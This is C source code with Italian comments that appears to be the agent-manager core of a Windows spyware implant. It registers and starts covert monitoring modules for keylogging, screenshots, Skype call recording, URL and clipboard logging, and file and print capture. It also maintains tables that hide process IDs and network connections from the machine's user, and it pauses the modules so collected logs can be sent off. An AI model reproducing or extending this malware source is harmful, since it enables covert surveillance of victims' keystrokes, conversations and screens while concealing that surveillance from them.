#include <windows.h>
#include "common.h"
#include "H4-DLL.h"
#include "AM_Core.h"
#include "LOG.h"

// XXX Definita in HM_IpcModule!!!!
#define MAX_MSG_LEN 512 // Lunghezza di un messaggio
typedef struct {
	BYTE status; 
#define STATUS_FREE 0 // Libero
#define STATUS_BUSY 1 // In scrittura
#define STATUS_WRIT 2 // Scritto
	FILETIME time_stamp;
	DWORD wrapper_tag;
	DWORD message_len;
	DWORD flags;
	BYTE message[MAX_MSG_LEN];
} message_struct;


extern message_struct *IPCServerPeek();
extern void IPCServerRemove(message_struct *);
extern void IPCServerWrite(DWORD, BYTE *, DWORD);
extern void IPCServerInit();

extern void PM_FileAgentRegister();
extern void PM_KeyLogRegister();
extern void PM_SnapShotRegister();
extern void PM_PrintAgentRegister();
extern void PM_CrisisAgentRegister();
extern void PM_SkypeRecordRegister(); 
extern void PM_UrlLogRegister();
extern void PM_ClipBoardRegister();

void AM_SuspendRestart(DWORD);


typedef DWORD (__stdcall *PMD_Generic_t) (BYTE *, DWORD, DWORD, FILETIME *); // Prototipo per il dispatch
typedef DWORD (__stdcall *PMS_Generic_t) (BOOL); // Prototipo per lo Start/Stop
typedef DWORD (__stdcall *PMI_Generic_t) (BYTE *, BOOL); // Prototipo per l'Init
typedef DWORD (__stdcall *PMU_Generic_t) (void); // Prototipo per l'UnRegister

#define AM_MAXDISPATCH 50

typedef struct {
	DWORD dwTAG;
	PMD_Generic_t pDispatch; 
	PMS_Generic_t pStartStop; 
	PMI_Generic_t pInit; 
	PMU_Generic_t pUnRegister;
	BOOL started;
} AMDispatchStruct;

AMDispatchStruct aDispatchArray[AM_MAXDISPATCH];
DWORD dwDispatchCnt = 0;

////////////////////////////////////////////////
// Funzioni e strutture per l'hiding dinamico //
// di connessioni,PID e directory             //
////////////////////////////////////////////////
BYTE *hiding_table[HIDE_ELEM] = {NULL, NULL};
DWORD hiding_count[HIDE_ELEM] = {0, 0}; // Numero di elementi nascosti per tipo

// Ritorna la dimensione dell'elemento corrispondente al tipo
DWORD AM_HideElemSize(DWORD type)
{
	if (type == HIDE_PID)
		return sizeof(pid_hide_struct);
	else if (type == HIDE_CNN)
		return sizeof(connection_hide_struct);
	else
		return 0;
}

// Ritorna il wrapper tag relativo al tipo da nascondere
DWORD AM_HideWrapperTag(DWORD type)
{
	if (type == HIDE_PID)
		return WR_HIDE_PID;
	else if (type == HIDE_CNN)
		return WR_HIDE_CON;
	else
		return 0;
}

// Ritorna una struttura nulla del tipo relativo
BYTE *AM_HideNullEntry(DWORD type)
{
	static connection_hide_struct connection_hide = NULL_CONNETCION_HIDE_STRUCT;
	static pid_hide_struct pid_hide = NULL_PID_HIDE_STRUCT;

	if (type == HIDE_PID)
		return (BYTE *)&pid_hide;
	else if (type == HIDE_CNN)
		return (BYTE *)&connection_hide;
	else
		return NULL;
}

// Non e' thread safe (solo il SyncManager dovrebbe chiamarla)
// Aggiunge un elemento da nascondere alla relativa tabella
BOOL AM_AddHide(DWORD type, void *elem_par)
{
	BYTE *elem = (BYTE *)elem_par;
	BYTE *temp_table = NULL;
	DWORD elem_size = 0;

	// Setta la dimensione di un elemento della tabella
	if ( (elem_size = AM_HideElemSize(type)) == 0 )
		return FALSE;

	// Allarga la tabella degli elementi interessati
	// XXX...altro piccolo ed improbabile int overflow....
	if ( !(temp_table = (BYTE *)realloc(hiding_table[type], (hiding_count[type] + 1)*elem_size)) )
		return FALSE;

	// Aggiunge l'elemento nuovo
	hiding_table[type] = temp_table;
	memcpy(hiding_table[type] + hiding_count[type] * elem_size, elem, elem_size);
	hiding_count[type]++;

	// Aggiorna la shared memory
	// Tiene conto che ogni wrapper ha a disposizione una dimensione massima
	// per la configurazione. Se la dimensione eccede quella copiabile, non fa
	// niente (gli elementi nuovi non verrebbero comunque copiati).
	// Termina sempre con una entry nulla (la memoria shared viene inizializzata
	// a 0).

	// Controlla che ci sia lo spazio per copiare la tabella e che venga 
	// lasciata la entry nulla alla fine
	if ( (hiding_count[type] + 1) * elem_size > WRAPPER_MAX_SHARED_MEM )
		return TRUE;

	IPCServerWrite(AM_HideWrapperTag(type), hiding_table[type], hiding_count[type] * elem_size);

	return TRUE;
}


// XXX Non e' thread safe (solo il SyncManager dovrebbe chiamarla)
// Toglie un elemento da nascondere dalla relativa tabella
void AM_RemoveHide(DWORD type, void *elem_par)
{
	BYTE *elem = (BYTE *)elem_par;
	DWORD elem_size = 0;
	DWORD i, last_bytes;

	// Setta la dimensione di un elemento della tabella
	if ( (elem_size = AM_HideElemSize(type)) == 0 )
		return;

	// Cerca l'elemento da eliminare
	for (i=0; i<hiding_count[type]; i++) {
		// L'ha trovato
		if (!memcmp(hiding_table[type] + i * elem_size, elem, elem_size)) {
			// Calcola quanti byte ci sono dopo l'elemento in questione
			last_bytes = (hiding_count[type] - i - 1) * elem_size;

			// Sposta gli elementi successivi indietro per cancellare
			// quello da eliminare (se ce ne sono)
			if (last_bytes)
				memmove_s(hiding_table[type] + i * elem_size, last_bytes, hiding_table[type] + (i+1) * elem_size, last_bytes);
			
			// Diminuisce il numero di elementi e rialloca la memoria
			// (se il counter va a zero, equivale a una free).
			hiding_count[type]--;
			hiding_table[type] = (BYTE *)realloc(hiding_table[type], hiding_count[type] * elem_size);
			// Se la realloc fallisse lo considera come se non ci fossero piu' 
			// elementi (possibile memory leak, molto improbabile...controllo paranoico)
			if (!hiding_table[type])
				hiding_count[type] = 0;

			// Controlla che ci sia lo spazio per copiare la tabella 
			// XXX Non aggiorna la lista via IPC finche' non rimane un numero
			// di entry copiabili
			if ( (hiding_count[type] + 1) * elem_size > WRAPPER_MAX_SHARED_MEM )
				return;

			IPCServerWrite(AM_HideWrapperTag(type), hiding_table[type], hiding_count[type] * elem_size);
			// Elimina la entry in piu' che prima era presente
			IPCServerWrite(AM_HideWrapperTag(type) + (hiding_count[type] * elem_size), AM_HideNullEntry(type), elem_size);
		}
	}
}


// Funzione di utilita' per attivare gli agenti iniettati.
// Nella memoria relativa alla configurazione il primo BOOL indica
// se l'agente e' attivo o no.
void AM_IPCAgentStartStop(DWORD dwTag, BOOL bStartFlag)
{
	IPCServerWrite(dwTag, (BYTE *)&bStartFlag, sizeof(BOOL));
}


// Registra il Monitor con le funzioni di Init, StartStop e Dispatch
// Viene richiamata dalle funzioni di registrazione dei monitor.
DWORD AM_MonitorRegister(DWORD dwTAG, BYTE * pDispatch, BYTE * pStartStop, BYTE * pInit, BYTE *pUnRegister)
{
	if(dwDispatchCnt >= AM_MAXDISPATCH)
		return NULL;
	aDispatchArray[dwDispatchCnt].dwTAG = dwTAG;
	aDispatchArray[dwDispatchCnt].pDispatch = (PMD_Generic_t) pDispatch;
	aDispatchArray[dwDispatchCnt].pStartStop = (PMS_Generic_t) pStartStop;
	aDispatchArray[dwDispatchCnt].pInit = (PMI_Generic_t) pInit;
	aDispatchArray[dwDispatchCnt].pUnRegister = (PMU_Generic_t) pUnRegister;
	aDispatchArray[dwDispatchCnt].started = FALSE;
	
	dwDispatchCnt++;

	return 1;
}

// Esegue il dispatch per il monitor dwTag
DWORD AM_Dispatch(DWORD dwTag, BYTE * pMsg, DWORD dwMsgLen, DWORD dwFlags, FILETIME *tstamp)
{
	DWORD i;

	for(i=0; i<dwDispatchCnt; i++) {
		if(dwTag == aDispatchArray[i].dwTAG) {
			if (aDispatchArray[i].pDispatch)
				aDispatchArray[i].pDispatch(pMsg, dwMsgLen, dwFlags, tstamp);
			break;
		}
	}
	return 1;
}


// Esegue lo Start/Stop di un monitor a seconda di dwStartFlag
// TRUE = Start
// FALSE = Stop
DWORD AM_MonitorStartStop(DWORD dwTag, BOOL bStartFlag)
{
	DWORD i;

	for(i=0; i<dwDispatchCnt; i++) {
		if(dwTag == aDispatchArray[i].dwTAG) {
			aDispatchArray[i].started = bStartFlag;
			if (aDispatchArray[i].pStartStop)
				aDispatchArray[i].pStartStop(bStartFlag);
			break;
		}
	}
	return 1;
}


// Esegue l'init di un monitor
DWORD AM_MonitorInit(DWORD dwTag, BYTE *conf_ptr, BOOL bStartFlag)
{
	DWORD i;

	for(i=0; i<dwDispatchCnt; i++) {
		if(dwTag == aDispatchArray[i].dwTAG) {
			aDispatchArray[i].started = bStartFlag;
			if (aDispatchArray[i].pInit)
				aDispatchArray[i].pInit(conf_ptr, bStartFlag);
			break;
		}
	}
	return 1;
}


// Deregistra tutti gli agenti prima dell'uninstall
DWORD AM_UnRegisterAll()
{
	DWORD i;

	for(i=0; i<dwDispatchCnt; i++) {
		if (aDispatchArray[i].pUnRegister)
			aDispatchArray[i].pUnRegister();
	}
	return 1;
}


// Stoppa tutti gli agent (anche se sono gia' stoppati)
// Vengono poi attivati selettivamente dal file di conf
// o come action di un evento o con la ResartAll
DWORD AM_MonitorSuspendAll()
{
	DWORD i;

	for(i=0; i<dwDispatchCnt; i++) {
		if (aDispatchArray[i].pStartStop)
			aDispatchArray[i].pStartStop(FALSE);
	}
	return 1;
}

// Rimette gli agent nello stato in cui erano al momento
// della SuspendAll (usato quando c'e' una sync e uno scambio
// di code dei log).
DWORD AM_MonitorRestartAll()
{
	DWORD i;

	for(i=0; i<dwDispatchCnt; i++) {
		if (aDispatchArray[i].pStartStop && aDispatchArray[i].started)
			aDispatchArray[i].pStartStop(TRUE);
	}
	return 1;

}

#define STIME 25
HANDLE hAMThread = NULL;
BOOL bAM_cp = FALSE; // Semaforo per uscita thread AgentManager

DWORD AM_Main()
{	
	message_struct *msMsg;

	LOOP {		
		CANCELLATION_POINT(bAM_cp);
		msMsg = IPCServerPeek();
		if(msMsg) {
			AM_Dispatch(msMsg->wrapper_tag, msMsg->message, msMsg->message_len, msMsg->flags, &(msMsg->time_stamp));
			IPCServerRemove(msMsg);
		} else 
			Sleep(STIME);
	}
	
	return 1;
}


// Inizializza e lancia la prima volta l'AgentManager
DWORD AM_Startup()
{
	IPCServerInit();
	LOG_InitLog();

	// Vengono registrati i vari PM ed all'interno delle funzioni di
	// registrazione saranno aggiunti, nell'array aHookArray, gli hook
	// da fare....
	PM_FileAgentRegister();
	PM_KeyLogRegister();
	PM_SnapShotRegister();
	PM_PrintAgentRegister();
	PM_CrisisAgentRegister();
	PM_SkypeRecordRegister(); 
	PM_UrlLogRegister();
	PM_ClipBoardRegister();

	// Inizializza (dal file di configurazione) e fa partire gli agent
	// e il thread di dispatch
	AM_SuspendRestart(AM_RESET);

	return 1;
}


// Legge la configurazione degli agent da file
void UpdateAgentConf()
{
	BYTE *conf_memory;

	conf_memory = HM_ReadClearConf(H4_CONF_FILE);
	
	// Effettua il parsing del file di configurazione mappato
	// XXX Non c'e' il controllo che conf_ptr possa uscire fuori dalle dimensioni del file mappato
	// (viene assunto che la configurazione sia coerente e il file integro)
	if (conf_memory) {
		DWORD index, agent_count, is_active, tag, param_len;
		BYTE *conf_ptr;

		// conf_ptr si sposta nel file durante la lettura
		conf_ptr = (BYTE *)HM_memstr((char *)conf_memory, AGENT_CONF_DELIMITER);

		// ---- Configurazione agenti ----
		READ_DWORD(agent_count, conf_ptr);
		for (index=0; index<agent_count; index++) {
			READ_DWORD(tag, conf_ptr);
			READ_DWORD(is_active, conf_ptr);
			READ_DWORD(param_len, conf_ptr);
			AM_MonitorInit(tag, conf_ptr, is_active);
			conf_ptr += param_len;
		}

		SAFE_FREE(conf_memory);
	}
}


// Sospende/riprende il thread di AgentManager e starta/stoppa tutti gli agent, 
// per chiudere tutti i log prima di poterli spedire. 
// RESTART = inizializza la prima volta o (dopo una suspend) riporta tutto allo stato
//           del file di configurazione (nel caso di una nuova conf scaricata).
// SUSPEND = Stoppa gli agent memorizzando lo stato in cui si trovavano in quel momento
// RESTART = Rimette gli agent nello stato in cui erano al momento della suspend (usato 
//           dopo che viene scambiata la coda dei log).
void AM_SuspendRestart(DWORD action)
{
	DWORD dwThid;

	// Stoppa tutti gli agent
	if (action == AM_SUSPEND) { 
		// Killa il thread e stoppa gli agent
		QUERY_CANCELLATION(hAMThread, bAM_cp);
		AM_MonitorSuspendAll();
	} else if (action == AM_RESET) {
		// Attiva gli agent e inizializza il thread
		// riportandoli nello stato del file di configuazione.
		UpdateAgentConf();
		hAMThread = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE) AM_Main, (LPVOID) NULL, 0, &dwThid);		
	} else if (action == AM_RESTART) {
		// Attiva gli agent (secondo lo stato salvato)
		// e inizializza il thread.
		AM_MonitorRestartAll();
		hAMThread = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE) AM_Main, (LPVOID) NULL, 0, &dwThid);		
	} else if (action == AM_EXIT) {
		// Killa il thread e stoppa gli agent
		QUERY_CANCELLATION(hAMThread, bAM_cp);
		AM_MonitorSuspendAll();
		// Esegue le funzioni di uscita degli agent
		AM_UnRegisterAll();
	}
}